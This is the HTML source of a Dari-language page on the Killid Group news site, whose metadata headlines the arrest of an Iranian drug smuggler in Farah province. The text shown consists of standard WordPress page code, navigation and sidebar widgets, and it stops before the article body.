<!DOCTYPE html>
<html lang="prs-AF" itemscope itemtype="http://schema.org/Blog" prefix="og: http://ogp.me/ns#">
<head prefix="article: http://ogp.me/ns/article#" >


<!-- This site is optimized with the Yoast SEO plugin v4.9 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://tkg.af/%db%8c%da%a9-%d8%aa%d8%a8%d8%b9%d9%87-%d8%a7%db%8c%d8%b1%d8%a7%d9%86%db%8c-%d8%a8%d9%87-%d8%a7%d8%aa%d9%87%d8%a7%d9%85-%d9%82%d8%a7%da%86%d8%a7%d9%82-%d9%85%d9%88%d8%a7%d8%af-%d9%85%d8%ae%d8%af%d8%b1/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="یک تبعه ایرانی به اتهام قاچاق مواد مخدر در فراه گرفتار شد - ویب سایت خبری کلید گروپ" />
<meta property="og:description" content="پولیس فراه یک قاچاقبر ایرانی را با بیش از 27 کیلوگرام مواد مخدر گرفتار کرده است." />
<meta property="og:url" content="http://tkg.af/%db%8c%da%a9-%d8%aa%d8%a8%d8%b9%d9%87-%d8%a7%db%8c%d8%b1%d8%a7%d9%86%db%8c-%d8%a8%d9%87-%d8%a7%d8%aa%d9%87%d8%a7%d9%85-%d9%82%d8%a7%da%86%d8%a7%d9%82-%d9%85%d9%88%d8%a7%d8%af-%d9%85%d8%ae%d8%af%d8%b1/" />
<meta property="og:site_name" content="ویب سایت خبری کلید گروپ" />
<meta property="article:section" content="جنوب غرب" />
<meta property="article:published_time" content="۱۳۹۷-۰۳-۱۶T15:20:15+00:00" />
<meta property="og:image" content="http://tkg.af/wp-content/uploads/2018/03/بازداشت-2.jpg" />
<meta property="og:image:width" content="600" />
<meta property="og:image:height" content="400" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="پولیس فراه یک قاچاقبر ایرانی را با بیش از 27 کیلوگرام مواد مخدر گرفتار کرده است." />
<meta name="twitter:title" content="یک تبعه ایرانی به اتهام قاچاق مواد مخدر در فراه گرفتار شد - ویب سایت خبری کلید گروپ" />
<meta name="twitter:image" content="http://tkg.af/wp-content/uploads/2018/03/بازداشت-2.jpg" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="ویب سایت خبری کلید گروپ &raquo; Feed" href="http://tkg.af/feed/" />
<link rel="alternate" type="application/rss+xml" title="ویب سایت خبری کلید گروپ &raquo; Comments Feed" href="http://tkg.af/comments/feed/" />
<meta property="fb:admins" content="YOUR USER ID"/><meta property="og:title" content="یک تبعه ایرانی به اتهام قاچاق مواد مخدر در فراه گرفتار شد"/><meta property="og:type" content="article"/><meta property="og:url" content="http://tkg.af/%db%8c%da%a9-%d8%aa%d8%a8%d8%b9%d9%87-%d8%a7%db%8c%d8%b1%d8%a7%d9%86%db%8c-%d8%a8%d9%87-%d8%a7%d8%aa%d9%87%d8%a7%d9%85-%d9%82%d8%a7%da%86%d8%a7%d9%82-%d9%85%d9%88%d8%a7%d8%af-%d9%85%d8%ae%d8%af%d8%b1/"/><meta property="og:site_name" content="The Killid Group"/><meta property="og:image" content="http://tkg.af/wp-content/uploads/2018/03/بازداشت-2-300x200.jpg"/>
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/tkg.af\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b===c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='ssbaFont-css'  href='//fonts.googleapis.com/css?family=Indie+Flower&#038;ver=4.8' type='text/css' media='all' />
<script type='text/javascript' src='http://tkg.af/wp-content/themes/shark/ajaxcomments.js?ver=4.8'></script>
<script type='text/javascript' src='http://tkg.af/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://tkg.af/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<link rel='https://api.w.org/' href='http://tkg.af/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://tkg.af/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://tkg.af/wp-includes/wlwmanifest.xml" /> 

<link rel='shortlink' href='http://tkg.af/?p=46597' />
<link rel="alternate" type="application/json+oembed" href="http://tkg.af/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftkg.af%2F%25db%258c%25da%25a9-%25d8%25aa%25d8%25a8%25d8%25b9%25d9%2587-%25d8%25a7%25db%258c%25d8%25b1%25d8%25a7%25d9%2586%25db%258c-%25d8%25a8%25d9%2587-%25d8%25a7%25d8%25aa%25d9%2587%25d8%25a7%25d9%2585-%25d9%2582%25d8%25a7%25da%2586%25d8%25a7%25d9%2582-%25d9%2585%25d9%2588%25d8%25a7%25d8%25af-%25d9%2585%25d8%25ae%25d8%25af%25d8%25b1%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://tkg.af/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftkg.af%2F%25db%258c%25da%25a9-%25d8%25aa%25d8%25a8%25d8%25b9%25d9%2587-%25d8%25a7%25db%258c%25d8%25b1%25d8%25a7%25d9%2586%25db%258c-%25d8%25a8%25d9%2587-%25d8%25a7%25d8%25aa%25d9%2587%25d8%25a7%25d9%2585-%25d9%2582%25d8%25a7%25da%2586%25d8%25a7%25d9%2582-%25d9%2585%25d9%2588%25d8%25a7%25d8%25af-%25d9%2585%25d8%25ae%25d8%25af%25d8%25b1%2F&#038;format=xml" />
<style type="text/css"></style><script type="text/javascript">
	window._wp_rp_static_base_url = 'https://wprp.zemanta.com/static/';
	window._wp_rp_wp_ajax_url = "http://tkg.af/wp-admin/admin-ajax.php";
	window._wp_rp_plugin_version = '3.6.4';
	window._wp_rp_post_id = '46597';
	window._wp_rp_num_rel_posts = '4';
	window._wp_rp_thumbnails = true;
	window._wp_rp_post_title = '%DB%8C%DA%A9+%D8%AA%D8%A8%D8%B9%D9%87+%D8%A7%DB%8C%D8%B1%D8%A7%D9%86%DB%8C+%D8%A8%D9%87+%D8%A7%D8%AA%D9%87%D8%A7%D9%85+%D9%82%D8%A7%DA%86%D8%A7%D9%82+%D9%85%D9%88%D8%A7%D8%AF+%D9%85%D8%AE%D8%AF%D8%B1+%D8%AF%D8%B1+%D9%81%D8%B1%D8%A7%D9%87+%DA%AF%D8%B1%D9%81%D8%AA%D8%A7%D8%B1+%D8%B4%D8%AF';
	window._wp_rp_post_tags = ['%3F%3F%3F%3F%3F%3F%3F-%3F%3F%3F', '%3F%3F%3F%3F%3F%3F+%3F%3F%3F%3F%3F', '%3F%3F%3F%3F+%3F%3F%3F', '27'];
	window._wp_rp_promoted_content = true;
</script>
<link rel="stylesheet" href="http://tkg.af/wp-content/plugins/wordpress-23-related-posts-plugin/static/themes/vertical.css?version=3.6.4" />
<style type="text/css">
.wp_rp_content{width:100%;
box-shadow: 0px 1px 4px 0px #555;
    padding: 10px 25px;
    margin: 20px 0;
}
.related_post_title {
    padding-bottom: 10px !important;
    margin: 25px 0 10px  !important;
    font-size: 18px;
    border-bottom: 1px solid #E96D23;
}
ul.related_post {
}
ul.related_post li {
width:23% !important;
}
ul.related_post li a {
}
ul.related_post li img {
width:100% !important ;height:auto !important;
}</style>
		<style type="text/css" id="wp-custom-css">
			/*
You can add your own CSS here.

Click the help icon above to learn more.
*/
		</style>
	<meta property="article:publisher" content="https://www.facebook.com/khabarnamaaf/" />
<meta property="fb:app_id" content="404990726261318" />
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>یک تبعه ایرانی به اتهام قاچاق مواد مخدر در فراه گرفتار شد - ویب سایت خبری کلید گروپ</title>
	<link rel=stylesheet type="text/css" href="http://tkg.af/wp-content/themes/shark/css/p.css" media='print' />

<link href="http://tkg.af/wp-content/themes/shark/assets/owlcarousel2/owl.carousel.css" rel="stylesheet">
	
<link rel="icon" type="image/x-icon" href="http://tkg.af/wp-content/themes/shark/images/favicon.png" />
<link rel="icon" type="image/x-icon" href="http://tkg.af/wp-content/themes/shark/images/tkg2.png" />
<link rel="profile" href="http://gmpg.org/xfn/11" />


<!--  css files  -->
<link rel="stylesheet" type="text/css" media="all" href="http://tkg.af/wp-content/themes/shark/css/bootstrap/css/bootstrap.css" />   
<link rel="stylesheet" type="text/css" media="all" href="http://tkg.af/wp-content/themes/shark/css/bootstrap/css/bootstrap-theme.css" />
<link rel="stylesheet" type="text/css" media="all" href="http://tkg.af/wp-content/themes/shark/fonts/font-awesome/css/font-awesome.css" />
<link href="http://tkg.af/wp-content/themes/shark/css/style.css" rel="stylesheet" media="screen">
<link href="http://tkg.af/wp-content/themes/shark/css/print.css" rel="stylesheet" media="print">



<!--[if lt IE 9]>
	<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
	<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
	
</head>
<body>
<!-- navbar -->
<nav class="navbar navbar-default navbar-fixed-top" style="background:#E96D23">
	<div class="container-fluid container" id="navtop">
		<!-- Brand and toggle get grouped for better mobile display -->
		<div class="navbar-header">
			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
				<span class="sr-only">Toggle navigation</span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
			</button>
			<!-- <a class="navbar-brand" href="#">Brand</a> -->
		</div>

		<!-- Collect the nav links, forms, and other content for toggling -->
		<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul id="menu-menu-1" class="nav navbar-nav navbar-right"><li id="menu-item-36152" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36152"><a href="http://tkg.af/%d8%b1%d8%a7%d8%af%db%8c%d9%88-%da%a9%d9%84%db%8c%d8%af-2/">رادیو کلید</a></li>
<li id="menu-item-36151" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36151"><a href="http://tkg.af/%da%a9%d8%a7%d8%a8%d9%84-%d8%b1%d8%a7%da%a9-%d8%b1%d8%a7%d8%af%db%8c%d9%88/">کابل راک رادیو</a></li>
<li id="menu-item-36150" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36150"><a href="http://tkg.af/%d9%81%d8%b5%d9%84-%d9%86%d8%a7%d9%85%d9%87-%d8%b3%d9%be%db%8c%d8%af%d9%87/">فصل نامه سپیده</a></li>
<li id="menu-item-36149" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36149"><a href="http://tkg.af/%d9%87%d9%81%d8%aa%d9%87-%d9%86%d8%a7%d9%85%d9%87-%d9%85%d8%b1%d8%b3%d9%84-2/">هفته نامه مرسل</a></li>
<li id="menu-item-36148" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36148"><a href="http://tkg.af/%d9%87%d9%81%d8%aa%d9%87-%d9%86%d8%a7%d9%85%d9%87-%da%a9%d9%84%db%8c%d8%af/">هفته نامه کلید</a></li>
<li id="menu-item-36147" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36147"><a href="http://tkg.af/%d8%aa%d9%85%d8%a7%d8%b3-%d8%a8%d8%a7-%d9%85%d8%a7/">تماس با ما</a></li>
<li id="menu-item-36146" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36146"><a href="http://tkg.af/?p=35877">درباره ما</a></li>
</ul>
						
			<ul class="nav navbar-nav">
				<li><a href="http://tkg.af/english/">English</a></li> 
				<li id="seprator">|</li>
				<li><a href="http://tkg.af/pashto/">پشتو</a></li>
			</ul>
		</div><!-- /.navbar-collapse -->
	</div><!-- /.container-fluid -->
	<div class="hidden-lg hidden-md hidden-sm col-xs-12">
			<div class="col-xs-6 aps" align="right"><a href="https://play.google.com/store/apps/details?id=af.techsharks.thekillidgroup" target="_blank"><img src="http://tkg.af/land/google_play.png"></a></div>
			<div class="col-xs-6 aps" align="left"><a href="https://itunes.apple.com/us/app/tkg/id1148853903" target="_blank"><img src="http://tkg.af/land/app_store.png"></a></div>
	</div>
</nav>
<!-- navbar -->
<!-- ads -->
<div class="ads">
		<div class="container">
				<div class="col-lg-5 col-xs-12" id="logo">
						<a href='http://tkg.af/'><img src="http://tkg.af/wp-content/themes/shark/images/tkg2.png"></a>
				</div>
				<div class="col-lg-7 hidden-sm hidden-xs" id="ads">
								<div id="carousel-example-generics" class="carousel slide" data-ride="carousel">
			<!-- Indicators -->
			<!-- Wrapper for slides dari -->
			<div class="carousel-inner" role="listbox">
				 <div class="item active">
					 <a href="http://tkg.af/radios/"><img src="http://tkg.af/wp-content/uploads/2016/08/Web-Banner-604X55PX.gif" width="100%" /></a>
				</div>
			</div>                 
		</div>		
		<!-- slides -->
						</div>
		</div>
</div>
<!-- ads -->
<!-- mdnav -->
<nav class="navbar navbar-default">
	<div class="container-fluid container" id="mdnav">
		<!-- Brand and toggle get grouped for better mobile display -->
		<div class="navbar-header">
			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1l" aria-expanded="false">
				<span class="sr-only">Toggle navigation</span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
			</button>
		</div>

		<!-- Collect the nav links, forms, and other content for toggling -->
		<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1l">
			<form class="navbar-form navbar-left"  action="http://tkg.af/">
				<div class="form-group">
					<input type="text" value="" name='s' class="form-control" placeholder="جستجو">
				</div>
				<span class="fa fa-search" id="search"></span>
			</form>
			
<ul id="menu-mainmenu" class="nav navbar-nav navbar-right"><li id="menu-item-36153" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36153"><a href="http://tkg.af/category/culture-and-art/">فرهنگ و هنر</a>
<ul class="sub-menu">
	<li id="menu-item-36154" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36154"><a href="http://tkg.af/category/culture-and-art/literature/">ادبیات</a></li>
	<li id="menu-item-36155" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36155"><a href="http://tkg.af/category/culture-and-art/cinema/">سینما</a></li>
	<li id="menu-item-36156" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36156"><a href="http://tkg.af/category/culture-and-art/book/">کتاب</a></li>
	<li id="menu-item-36157" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36157"><a href="http://tkg.af/category/culture-and-art/music/">موسیقی</a></li>
	<li id="menu-item-36158" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36158"><a href="http://tkg.af/category/culture-and-art/life-story/">قصه زندگی</a></li>
	<li id="menu-item-36124" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36124"><a href="http://tkg.af/category/culture-and-art/others-culture-and-art/">و مطالب دیگر فرهنگ</a></li>
</ul>
</li>
<li id="menu-item-36159" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36159"><a href="http://tkg.af/category/sport/">ورزش</a>
<ul class="sub-menu">
	<li id="menu-item-36160" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36160"><a href="http://tkg.af/category/sport/martial-art/">ورزش های رزمی</a></li>
	<li id="menu-item-36161" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36161"><a href="http://tkg.af/category/sport/football/">فوتبال</a></li>
	<li id="menu-item-36162" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36162"><a href="http://tkg.af/category/sport/cricket/">کریکت</a></li>
	<li id="menu-item-36163" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36163"><a href="http://tkg.af/category/sport/bozkashi/">بزکشی</a></li>
	<li id="menu-item-36164" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36164"><a href="http://tkg.af/category/sport/oth/">و مطالب دیگر</a></li>
</ul>
</li>
<li id="menu-item-36165" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36165"><a href="http://tkg.af/category/multimedia/">صوت و تصویر</a>
<ul class="sub-menu">
	<li id="menu-item-36166" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36166"><a href="http://tkg.af/category/multimedia/video-reports/">گزارش های ویدیویی</a></li>
</ul>
</li>
<li id="menu-item-36167" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36167"><a href="http://tkg.af/category/economy/">اقتصاد</a>
<ul class="sub-menu">
	<li id="menu-item-36168" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36168"><a href="http://tkg.af/category/economy/regeneration/">بازسازی</a></li>
	<li id="menu-item-36169" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36169"><a href="http://tkg.af/category/economy/business/">تجارت</a></li>
	<li id="menu-item-36170" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36170"><a href="http://tkg.af/category/economy/agricultural/">زراعت و باغداری</a></li>
</ul>
</li>
<li id="menu-item-36171" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36171"><a href="http://tkg.af/category/reports/">گزارش</a>
<ul class="sub-menu">
	<li id="menu-item-36172" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36172"><a href="http://tkg.af/category/reports/research/">تحقیقاتی</a></li>
	<li id="menu-item-36173" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36173"><a href="http://tkg.af/category/reports/political/">سیاسی</a></li>
	<li id="menu-item-36174" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36174"><a href="http://tkg.af/category/reports/health/">صحت</a></li>
	<li id="menu-item-36175" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36175"><a href="http://tkg.af/category/reports/environment/">محیط زیست</a></li>
	<li id="menu-item-36176" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36176"><a href="http://tkg.af/category/reports/commercial/">اقتصادی</a></li>
	<li id="menu-item-36177" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36177"><a href="http://tkg.af/category/reports/social/">اجتماعی</a></li>
	<li id="menu-item-36178" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36178"><a href="http://tkg.af/category/transitional-justice/">عدالت انتقالی</a></li>
	<li id="menu-item-36179" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36179"><a href="http://tkg.af/category/reports/special-reports/">گزارش های ویژه</a></li>
	<li id="menu-item-36180" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36180"><a href="http://tkg.af/category/reports/imc/">کنسرسیوم رسانه های آزاد</a></li>
	<li id="menu-item-36181" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36181"><a href="http://tkg.af/category/economy/others-economy/">و سایر گزارش ها</a></li>
</ul>
</li>
<li id="menu-item-36182" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36182"><a href="http://tkg.af/category/comments/">تحلیل و دیدگاه</a>
<ul class="sub-menu">
	<li id="menu-item-36183" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36183"><a href="http://tkg.af/category/comments/analysis/">تحلیل</a></li>
	<li id="menu-item-36184" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36184"><a href="http://tkg.af/category/comments/views/">دیدگاه</a></li>
	<li id="menu-item-36185" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36185"><a href="http://tkg.af/category/comments/others-comments/">و سایر مطالب</a></li>
</ul>
</li>
<li id="menu-item-36136" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36136"><a href="http://tkg.af/category/world-news/">خبرهای خارجی</a>
<ul class="sub-menu">
	<li id="menu-item-36137" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36137"><a href="http://tkg.af/category/world-news/afghanistan-neighbors-news/">همسایه های افغانستان</a></li>
	<li id="menu-item-36138" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36138"><a href="http://tkg.af/category/world-news/world-news-world-news/">منطقه و جهان</a></li>
</ul>
</li>
<li id="menu-item-36135" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36135"><a href="http://tkg.af/category/afghanistan-news/">خبرهای داخلی</a>
<ul class="sub-menu">
	<li id="menu-item-36134" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36134"><a href="http://tkg.af/category/afghanistan-news/kabul/">کابل</a></li>
	<li id="menu-item-36133" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36133"><a href="http://tkg.af/category/afghanistan-news/south/">جنوب</a></li>
	<li id="menu-item-36132" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36132"><a href="http://tkg.af/category/afghanistan-news/southeast/">جنوب شرق</a></li>
	<li id="menu-item-36131" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36131"><a href="http://tkg.af/category/afghanistan-news/southwest/">جنوب غرب</a></li>
	<li id="menu-item-36130" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36130"><a href="http://tkg.af/category/afghanistan-news/centeral-provinces/">ساحات مرکزی</a></li>
	<li id="menu-item-36129" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36129"><a href="http://tkg.af/category/afghanistan-news/east/">شرق</a></li>
	<li id="menu-item-36128" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36128"><a href="http://tkg.af/category/afghanistan-news/north/">شمال</a></li>
	<li id="menu-item-36127" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36127"><a href="http://tkg.af/category/afghanistan-news/northeast/">شمال شرق</a></li>
	<li id="menu-item-36126" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36126"><a href="http://tkg.af/category/afghanistan-news/northwest/">شمال غرب</a></li>
	<li id="menu-item-36125" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36125"><a href="http://tkg.af/category/afghanistan-news/west/">غرب</a></li>
</ul>
</li>
<li id="menu-item-31893" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-31893"><a href="http://tkg.af">صفحه نخست</a></li>
</ul>
						
		</div><!-- /.navbar-collapse -->
	</div><!-- /.container-fluid -->
</nav>
<!-- mdnav --><!-- content -->
<div id="content">
    <div class="container white singlewhite" id="card">
        <div class="row">
        <div class="col-lg-3 col-md-3 col-sm-3 col-xs-12 hdsm"><br>
<h4 class=rdc>رادیو کلید FM 88 
	<li class="dropdown radio-list">
	<a href="#" class="dropdown-toggle arrow-down" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><span class="caret"></span></a>
	<ul class="dropdown-menu" style='top:0px'>
		<li><a onclick='player("s1.voscast.com&amp;port=7886", "رادیو کلید کابل ")' href="javascript:;">رادیو کلید کابل</a></li>
		<li><a onclick='player("s6.voscast.com&amp;port=9354", "رادیو کلید هرات ")' href="javascript:;">رادیو کلید هرات</a></li>
		<li><a onclick='player("s6.voscast.com&amp;port=9152", "رادیو کلید جلاا آباد ")' href="javascript:;">رادیو کلید جلال آباد</a></li>
		<li><a onclick='player("s6.voscast.com&amp;port=9424", "رادیو کلید کندهار ")' href="javascript:;">رادیو کلید کندهار</a></li>
		<li><a onclick='player("s6.voscast.com&amp;port=9672", "رادیو کلید مزار ")' href="javascript:;">رادیو کلید مزار</a></li>
		<li><a onclick='player("s6.voscast.com&amp;port=9676", "رادیو کلید خوست ")' href="javascript:;">رادیو کلید خوست</a></li>
		<li><a onclick='player("s1.voscast.com&amp;port=7886", "رادیو کلید غزنی ")' href="javascript:;">رادیو کلید غزنی</a></li>
	</ul>
	</li>
</h4>
<div class="aligncenter"><a href="http://tkg.af/radios/"><img src="/wp-content/themes/shark/images/Banner.gif" width="100%"></a></div>
<iframe id='radioPlayer' src="http://cdn.voscast.com/player/player.php?host=s1.voscast.com&amp;port=7886" autoplay="false" width="150" height="30" frameborder="0" scrolling="no" style='width:100%;background:#000'></iframe>
				<h4 class=graycl><a href="http://tkg.af/category/%d9%87%d9%81%d8%aa%d9%87-%d9%86%d8%a7%d9%85%d9%87/"><b>هفته نامه کلید</b></a></h4>
			<div id="carousel-example-generics01" class="carousel slide" data-ride="carousel">
				<ol class="carousel-indicators" id="custm">	
									<li data-target="#carousel-example-generics01" data-slide-to="0" class="active"></li>
									<li data-target="#carousel-example-generics01" data-slide-to="1" class=""></li>
									<li data-target="#carousel-example-generics01" data-slide-to="2" class=""></li>
								</ol>
			<div class="carousel-inner" role="listbox">
									 <div class="item active">
						<a href="javascript:window.open('http://tkg.af/%d9%87%d9%81%d8%aa%d9%87-%d9%86%d8%a7%d9%85%d9%87-%da%a9%d9%84%db%8c%d8%af%db%b7%db%b8%db%b6/', 'هفته نامه کلید(۷۸۶)', 'width=992,height=600,resizable=yes');"><img src="http://tkg.af/wp-content/uploads/2018/05/Killid-Cover-786-263x160.jpg" width="100%" style="height:160px">
						<div class="carousel-caption">
						هفته نامه کلید(۷۸۶)						</div>
						</a>
					</div>  
									 <div class="item ">
						<a href="javascript:window.open('http://tkg.af/%d9%87%d9%81%d8%aa%d9%87-%d9%86%d8%a7%d9%85%d9%87-%da%a9%d9%84%db%8c%d8%af%db%b7%db%b8%db%b5/', 'هفته نامه کلید(۷۸۵)', 'width=992,height=600,resizable=yes');"><img src="http://tkg.af/wp-content/uploads/2018/05/Killid-Cover-263x160.jpg" width="100%" style="height:160px">
						<div class="carousel-caption">
						هفته نامه کلید(۷۸۵)						</div>
						</a>
					</div>  
									 <div class="item ">
						<a href="javascript:window.open('http://tkg.af/%d9%87%d9%81%d8%aa%d9%87-%d9%86%d8%a7%d9%85%d9%87-%da%a9%d9%84%db%8c%d8%af%db%b7%db%b8%db%b4/', 'هفته نامه کلید(۷۸۴)', 'width=992,height=600,resizable=yes');"><img src="http://tkg.af/wp-content/uploads/2018/03/7-cover-263x160.jpg" width="100%" style="height:160px">
						<div class="carousel-caption">
						هفته نامه کلید(۷۸۴)						</div>
						</a>
					</div>  
					
			</div>
		</div>
						
				<!-- tabs -->
                <div class="sidetab">
                  <!-- Nav tabs -->
                  <ul class="nav nav-tabs" role="tablist">
                    <li role="presentation" class="active"><a href="#home" aria-controls="home" role="tab" data-toggle="tab">پر بیننده ترین ها</a></li>
                    <li role="presentation"><a href="#profile" aria-controls="profile" role="tab" data-toggle="tab">فرهنگ و هنر</a></li>
                  </ul>

                    <div class="tab-content">
                            
					      
										<!-- col first  -->
                  	
                    <div role="tabpanel" class="tab-pane active" id="home">
                        <div class="row">
                          	
							 
							<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/06/سمر-2-80x60.jpg" alt="سیماسمر: رهایی زندانی بدون رضایت قربانی، غیرقانونی است" title="سیماسمر: رهایی زندانی بدون رضایت قربانی، غیرقانونی است"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d8%b3%db%8c%d9%85%d8%a7%d8%b3%d9%85%d8%b1-%d8%b1%d9%87%d8%a7%db%8c%db%8c-%d8%b2%d9%86%d8%af%d8%a7%d9%86%db%8c-%d8%a8%d8%af%d9%88%d9%86-%d8%b1%d8%b6%d8%a7%db%8c%d8%aa-%d9%82%d8%b1%d8%a8%d8%a7%d9%86/">سیماسمر: رهایی زندانی بدون رضایت قربانی، غیرقانونی است</a></h5>
